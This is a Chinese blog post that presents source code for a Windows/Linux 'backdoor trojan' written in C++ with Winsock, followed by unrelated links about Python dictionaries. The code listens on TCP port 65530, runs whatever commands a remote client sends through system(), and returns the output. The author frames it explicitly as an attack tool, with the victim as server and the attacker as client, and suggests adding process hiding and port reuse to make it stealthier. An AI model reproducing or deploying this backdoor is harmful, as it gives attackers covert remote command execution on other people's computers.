linux中基于C/C++socket通信的后台木马程序(含源码)
toyiye 2024-09-08 10:02 3 浏览 0 评论
##什么是socket通信?
网络上的两个程序通过一个双向的通信连接实现数据的交换,这个连接的一端称为一个socket。
建立网络通信连接至少要一对端口号(socket)。socket本质是编程接口(API),对TCP/IP的封装,TCP/IP也要提供可供程序员做网络开发所用的接口,这就是Socket编程接口;HTTP是轿车,提供了封装或者显示数据的具体形式;Socket是发动机,提供了网络通信的能力。
Socket的英文原义是“孔”或“插座”。作为BSD UNIX的进程通信机制,取后一种意思。通常也称作"套接字",用于描述IP地址和端口,是一个通信链的句柄,可以用来实现不同虚拟机或不同计算机之间的通信。在Internet上的主机一般运行了多个服务软件,同时提供几种服务。每种服务都打开一个Socket,并绑定到一个端口上,不同的端口对应于不同的服务。Socket正如其英文原义那样,像一个多孔插座。一台主机犹如布满各种插座的房间,每个插座有一个编号,有的插座提供220伏交流电, 有的提供110伏交流电,有的则提供有线电视节目。 客户软件将插头插到不同编号的插座,就可以得到不同的服务。
##现在我们来基于c/c++的socket来编写一个能够运行在windows上的后门软件,修改后可在linux上运行。
##所需要的头文件、命名空间和链接库
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string>
#include <windows.h>
#include <winsock.h>
#include <list>
#include <vector>
using namespace std;
#pragma comment(lib,"ws2_32.lib")
##初始化socket库
Socket_TCP_connect() {
WORD socketversion = MAKEWORD(2, 0); //初始化版本
WSADATA socketData; //初始化套接字内容
WSAStartup(socketversion, &socketData); //初始化socket库
}
##建立tcp套接字监听并绑定地址和端口
void Socket_TCP_Bind_Listen(int port = 65530, u_long ip_list = INADDR_ANY)
{
s1 = socket(AF_INET, SOCK_STREAM, 0);
sin1.sin_family = AF_INET;
sin1.sin_addr.S_un.S_addr = ip_list;
sin1.sin_port = htons(port);
bind(s1, (sockaddr *)&sin1, sizeof(sin1));
listen(s1, 5);
Socket_TCP_Accept();
}
##接受客户端信息
void Socket_TCP_Accept()
{
char buffer[1024];
int addrlen = sizeof(sin2);
while (true)
{
FILE *fp = fopen("123.txt", "w+");
fclose(fp);
cout << ">>wait for connect……" << endl;
s2 = accept(s1, (sockaddr *)&sin2, &addrlen);
cout << ">>connect from " << inet_ntoa(sin2.sin_addr) << endl;
while (true)
{
int ret = recv(s2, buffer, sizeof(buffer), 0);
buffer[ret] = 0x00;
string commend = buffer;
string cmd = "";
for (auto &chr : commend)
{
if (chr == '\n')
{
chr = ' ';
}
cmd = cmd + chr;
}
cmd = cmd + "> 123.txt";
char c[1024];
strcpy(c, cmd.c_str());
cout << "执行:" << endl;
cout << c << endl;
if (system(buffer) == 0)
{
send(s2, "OK", strlen("OK"), 0);
if (system(c) == 0)
{
char str[1024] = "";
FILE *fp2 = fopen("123.txt", "rb+");
fread(str, sizeof(char), 1024, fp2);
cout << str;
send(s2, str, strlen(str), 0);
fclose(fp2);
}
}
}
closesocket(s2);
}
closesocket(s1);
WSACleanup();
}
##核心思想:
本程序可以在主机上打开一个TCP连接,端口号为65530,并且接受客户端发来的指令,通过system()函数运行指令,并通过I/O操作将指令发送至客户端。
被攻击者为socket服务器端,攻击者为客户端。添加进程隐藏和多线程端口复用技术后,可以增加隐蔽性。
##完整源码:
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string>
#include <windows.h>
#include <winsock.h>
#include <list>
#include <vector>
using namespace std;
#pragma comment(lib,"ws2_32.lib")
class Socket_TCP_connect {
public:
//初始化socket库
Socket_TCP_connect() {
WORD socketversion = MAKEWORD(2, 0); //初始化版本
WSADATA socketData; //初始化套接字内容
WSAStartup(socketversion, &socketData); //初始化socket库
}
public:
//建立tcp套接字监听并绑定地址和端口
void Socket_TCP_Bind_Listen(int port = 65530, u_long ip_list = INADDR_ANY)
{
s1 = socket(AF_INET, SOCK_STREAM, 0);
sin1.sin_family = AF_INET;
sin1.sin_addr.S_un.S_addr = ip_list;
sin1.sin_port = htons(port);
bind(s1, (sockaddr *)&sin1, sizeof(sin1));
listen(s1, 5);
Socket_TCP_Accept();
}
private:
//接受客户端信息
void Socket_TCP_Accept()
{
char buffer[1024];
int addrlen = sizeof(sin2);
while (true)
{
FILE *fp = fopen("123.txt", "w+");
fclose(fp);
cout << ">>wait for connect……" << endl;
s2 = accept(s1, (sockaddr *)&sin2, &addrlen);
cout << ">>connect from " << inet_ntoa(sin2.sin_addr) << endl;
while (true)
{
int ret = recv(s2, buffer, sizeof(buffer), 0);
buffer[ret] = 0x00;
string commend = buffer;
string cmd = "";
for (auto &chr : commend)
{
if (chr == '\n')
{
chr = ' ';
}
cmd = cmd + chr;
}
cmd = cmd + "> 123.txt";
char c[1024];
strcpy(c, cmd.c_str());
cout << "执行:" << endl;
cout << c << endl;
if (system(buffer) == 0)
{
send(s2, "OK", strlen("OK"), 0);
if (system(c) == 0)
{
char str[1024] = "";
FILE *fp2 = fopen("123.txt", "rb+");
fread(str, sizeof(char), 1024, fp2);
cout << str;
send(s2, str, strlen(str), 0);
fclose(fp2);
}
}
}
closesocket(s2);
}
closesocket(s1);
WSACleanup();
}
private:
SOCKET s1, s2;
sockaddr_in sin1, sin2;
};
int main()
{
system("chcp 65001");
Socket_TCP_connect* conn = new Socket_TCP_connect();
conn->Socket_TCP_Bind_Listen();
return 0;
}
##实验效果:
注:需要C/C++ Linux服务器开发学习资料私信“资料”(资料包括C/C++,Linux,golang技术,Nginx,ZeroMQ,MySQL,Redis,fastdfs,MongoDB,ZK,流媒体,CDN,P2P,K8S,Docker,TCP/IP,协程,DPDK,ffmpeg等),免费分享
相关推荐
- # Python 3 # Python 3字典Dictionary(1)
-
Python3字典字典是另一种可变容器模型,且可存储任意类型对象。字典的每个键值(key=>value)对用冒号(:)分割,每个对之间用逗号(,)分割,整个字典包括在花括号({})中,格式如...
- Python第八课:数据类型中的字典及其函数与方法
-
Python3字典字典是另一种可变容器模型,且可存储任意类型对象。字典的每个键值...
- Python中字典详解(python 中字典)
-
字典是Python中使用键进行索引的重要数据结构。它们是无序的项序列(键值对),这意味着顺序不被保留。键是不可变的。与列表一样,字典的值可以保存异构数据,即整数、浮点、字符串、NaN、布尔值、列表、数...
- Python3.9又更新了:dict内置新功能,正式版十月见面
-
机器之心报道参与:一鸣、JaminPython3.8的热乎劲还没过去,Python就又双叒叕要更新了。近日,3.9版本的第四个alpha版已经开源。从文档中,我们可以看到官方透露的对dic...
- Python3 基本数据类型详解(python三种基本数据类型)
-
文章来源:加米谷大数据Python中的变量不需要声明。每个变量在使用前都必须赋值,变量赋值以后该变量才会被创建。在Python中,变量就是变量,它没有类型,我们所说的"类型"是变...
- 一文掌握Python的字典(python字典用法大全)
-
字典是Python中最强大、最灵活的内置数据结构之一。它们允许存储键值对,从而实现高效的数据检索、操作和组织。本文深入探讨了字典,涵盖了它们的创建、操作和高级用法,以帮助中级Python开发...
- 超级完整|Python字典详解(python字典的方法或操作)
-
一、字典概述01字典的格式Python字典是一种可变容器模型,且可存储任意类型对象,如字符串、数字、元组等其他容器模型。字典的每个键值key=>value对用冒号:分割,每个对之间用逗号,...
- Python3.9版本新特性:字典合并操作的详细解读
-
处于测试阶段的Python3.9版本中有一个新特性:我们在使用Python字典时,将能够编写出更可读、更紧凑的代码啦!Python版本你现在使用哪种版本的Python?3.7分?3.5分?还是2.7...
- python 自学,字典3(一些例子)(python字典有哪些基本操作)
-
例子11;如何批量复制字典里的内容2;如何批量修改字典的内容3;如何批量修改字典里某些指定的内容...
- Python3.9中的字典合并和更新,几乎影响了所有Python程序员
-
全文共2837字,预计学习时长9分钟Python3.9正在积极开发,并计划于今年10月发布。2月26日,开发团队发布了alpha4版本。该版本引入了新的合并(|)和更新(|=)运算符,这个新特性几乎...
- Python3大字典:《Python3自学速查手册.pdf》限时下载中
-
最近有人会想了,2022了,想学Python晚不晚,学习python有前途吗?IT行业行业薪资高,发展前景好,是很多求职群里严重的香饽饽,而要进入这个高薪行业,也不是那么轻而易举的,拿信工专业的大学生...
- python学习——字典(python字典基本操作)
-
字典Python的字典数据类型是基于hash散列算法实现的,采用键值对(key:value)的形式,根据key的值计算value的地址,具有非常快的查取和插入速度。但它是无序的,包含的元素个数不限,值...
- 324页清华教授撰写【Python 3 菜鸟查询手册】火了,小白入门字典
-
如何入门学习python...
- Python3.9中的字典合并和更新,了解一下
-
全文共2837字,预计学习时长9分钟Python3.9正在积极开发,并计划于今年10月发布。2月26日,开发团队发布了alpha4版本。该版本引入了新的合并(|)和更新(|=)运算符,这个新特性几乎...
- python3基础之字典(python中字典的基本操作)
-
字典和列表一样,也是python内置的一种数据结构。字典的结构如下图:列表用中括号[]把元素包起来,而字典是用大括号{}把元素包起来,只不过字典的每一个元素都包含键和值两部分。键和值是一一对应的...
你 发表评论:
欢迎- 一周热门
- 最近发表
-
- # Python 3 # Python 3字典Dictionary(1)
- Python第八课:数据类型中的字典及其函数与方法
- Python中字典详解(python 中字典)
- Python3.9又更新了:dict内置新功能,正式版十月见面
- Python3 基本数据类型详解(python三种基本数据类型)
- 一文掌握Python的字典(python字典用法大全)
- 超级完整|Python字典详解(python字典的方法或操作)
- Python3.9版本新特性:字典合并操作的详细解读
- python 自学,字典3(一些例子)(python字典有哪些基本操作)
- Python3.9中的字典合并和更新,几乎影响了所有Python程序员
- 标签列表
-
- r语言矩阵 (127)
- browsererror (114)
- exportexcel (119)
- cv2.bitwise_not (137)
- dump命令 (128)
- es6concat (126)
- heapify (127)
- java.security.egd (130)
- javax.annotation (117)
- jsstringsplit (117)
- js数字 (115)
- maven编译 (132)
- mysqlleft (128)
- nodejsbuffer (149)
- org.apache.commons.httpclient (126)
- org.jsoup (141)
- org.springframework.web (128)
- robotframework-ride (115)
- setnocounton (141)
- socket.gethostbyname (122)
- sqlmid (121)
- time.strptime (133)
- vscode格式化 (125)
- win32con (129)
- window.localstorage (126)